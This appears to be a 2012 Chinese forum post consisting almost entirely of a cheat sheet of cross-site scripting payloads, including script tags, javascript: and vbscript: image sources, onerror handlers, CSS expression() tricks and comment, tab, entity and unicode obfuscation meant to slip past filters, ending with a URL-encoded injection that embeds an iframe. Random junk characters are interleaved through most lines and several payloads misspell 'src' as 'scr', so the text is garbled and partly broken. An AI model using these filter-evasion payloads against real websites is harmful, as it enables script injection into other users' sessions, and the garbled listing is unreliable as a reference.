<script>alert("跨站")</script> (最常用) x# p9 N9 H" R2 P
<img scr=javascript:alert("跨站")></img>
0 ^0 n, L0 k J k, a% F1 J<img scr="javascript: alert(/跨站/)></img># P* [" e; k; E3 `; |, c
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)5 M. e# i2 @: g7 n) P$ J$ b/ Y
<img scr="#" onerror=alert(/跨站/)></img>
! W! C2 ^" H* }9 T<img scr="#" style="xss:expression(alert(/xss/));"></img>
7 V& k; V+ A. B1 G$ h. o0 \# H<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释); j1 r; b$ {8 O" [! K
<img src=vbscript:msgbox ("xss")></img>8 [* q; u) a7 i" d6 D) [& c
<style> input {left:expression (alert('xss'))}</style>2 s* e, z, T$ T, C6 T; N
<div style={left:expression (alert('xss'))}></div>
* J1 @& m% r3 k+ a0 i( u# H<div style={left:exp/* */ression (alert('xss'))}></div>
; j2 a5 }! E8 U( ^, \; Z, A% V% e<div style={left:\0065\0078ression (alert('xss'))}></div>- v6 ^- i3 A) B9 n: O$ T x6 h
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
% Q9 Y8 z, u- Y* W' F2 ?unicode <div style="{left:expRessioN (alert('xss'))}">* h8 Y7 P. A$ p5 t1 n2 A+ \
# e) x% v5 p1 r" \$ `; |5 F
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["/ P7 h( l1 _+ l) N, ~
|
发表于 2012-9-15 14:09:13
收藏
支持
反对